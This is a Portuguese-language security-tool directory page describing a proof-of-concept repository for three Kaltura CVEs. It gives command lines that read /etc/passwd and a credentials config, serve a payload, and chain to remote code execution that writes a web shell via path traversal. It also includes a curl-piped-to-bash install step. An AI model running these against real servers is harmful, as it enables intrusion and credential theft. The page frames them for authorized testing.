Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-19912-CVE-2026-19913-CVE-2026-19914 — Exploits de prova de conceito para CVE-2026-19912, CVE-2026-19913 e CVE-2026-19914, demonstrando leitura de arquivos e execução remota de código no Kaltura, destinados a testes de segurança autorizados e fins educacionais. | Kitploit
Ferramentas/GitHubGitHub/horkimhab/cve-2026-19912-cve-2026-19913-cve-2026-19914
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoAprendizado e Educação
GitHubhorkimhab/cve-2026-19912-cve-2026-19913-cve-2026-19914

CVE-2026-19912-CVE-2026-19913-CVE-2026-19914

Exploits de prova de conceito para CVE-2026-19912, CVE-2026-19913 e CVE-2026-19914, demonstrando leitura de arquivos e execução remota de código no Kaltura, destinados a testes de segurança autorizados e fins educacionais.

Ver Repositório
há 8h 25mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-19912, CVE-2026-19913, CVE-2026-19914

Doar

Ajude a manter este projeto

Se você acha este projeto útil, considere apoiar sua manutenção contínua por meio do PayPal ou do ABA Mobile.

❤️ ១០% នៃការបរិច្ចាគរបស់អ្នក នឹងត្រូវបានបរិច្ចាគជូនមន្ទីរពេទ្យគន្ធបុប្ផា។

❤️ Dez por cento de cada doação é destinado ao Hospital Infantil Kantha Bopha.

Escolha um método de pagamento

Doar com segurança via PayPal

Código QR de doação ABA Mobile
Escaneie com o ABA Mobile · Clique para ampliar

⚡ Uso Simples

Execute a versão mais recente do script de download externo diretamente do GitHub:

root@kitploit:~
bash <(curl -fsSL https://raw.githubusercontent.com/HORKimhab/collection-scripts/main/get-svn.sh)

Este comando requer Bash e curl. Revise o script remoto antes de executá-lo se você não confiar na fonte.

Use este projeto apenas em ambientes seguros e autorizados, como:

  • Máquinas virtuais locais
  • Contêineres Docker
  • Configurações de laboratório isoladas
  • Ambientes autorizados de teste de penetração

Exemplo de configuração:

root@kitploit:~
git clone <repository-url>
cd <repository-name>

# O projeto usa Python, siga abaixo

# Crie um ambiente virtual
python -m venv venv

# Ative o ambiente virtual

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Instale as dependências
pip install -r requirements.txt

Exemplo de uso:

root@kitploit:~
# 1. Leitura de arquivo (mais confiável, funciona conforme descrito no artigo)
python3 kaltura_poc.py fileread http://127.0.0.1 -f /etc/passwd
python3 kaltura_poc.py fileread http://127.0.0.1 \
    -f /opt/kaltura/app/configurations/local.ini --try-versions

# 2. Apenas o servidor de payload (use com Burp / curl manualmente)
python3 kaltura_poc.py serve --lport 8888

# 3. Estrutura da cadeia completa
python3 kaltura_poc.py rce http://127.0.0.1 \
    --lhost 172.17.0.1 --lport 8888 \
    --payload stdclass \
    --shell '../../../../../../../../var/www/html/shell.php'

Crédito ou Referência

  • https://anddone-git.github.io/2026/one-parameter-two-bugs/

📚 Repositório Educacional de Pesquisa em Segurança

Um repositório para aprender, testar e pesquisar conceitos de segurança cibernética em ambientes controlados.


⚠️ Aviso de Segurança e Legal

Propósito

Este repositório é destinado exclusivamente a pesquisa educacional e de segurança autorizada.

Ele foi projetado para ajudar os usuários a aprender sobre:

  • Vulnerabilidades de segurança
  • Conceitos de sandbox e isolamento
  • Práticas de codificação segura e defesa

Uso Autorizado Apenas

Use este repositório somente em ambientes onde você tenha permissão, como:

  • Laboratórios pessoais ou máquinas virtuais
  • Ambientes Docker ou isolados
  • Testes de penetração autorizados
  • Treinamento em segurança cibernética ou pesquisa acadêmica

O uso não autorizado ou ilegal é estritamente proibido.


Sem Responsabilidade

O autor e os colaboradores não são responsáveis por qualquer dano, uso indevido, problemas legais ou perdas causados por este projeto.

Ao usar este repositório, você concorda que:

  • Você é responsável por suas próprias ações
  • Você o usará de forma legal e ética
  • O projeto é fornecido sem garantia

Uso Ético

Este projeto destina-se a:

  • Pesquisa de segurança defensiva
  • Educação em segurança cibernética
  • Conscientização sobre vulnerabilidades
  • Pesquisa de sistemas e software seguros

Siga práticas de divulgação responsável e cumpra todas as leis aplicáveis.


Contato

Para divulgação responsável ou colaboração, entre em contato com o mantenedor do repositório pelo GitHub.


Projeto Relacionado

Explore a Coleção de PoCs de CVEs para recursos adicionais de prova de conceito de CVEs destinados a pesquisa e educação autorizadas em segurança.

Baixar ferramenta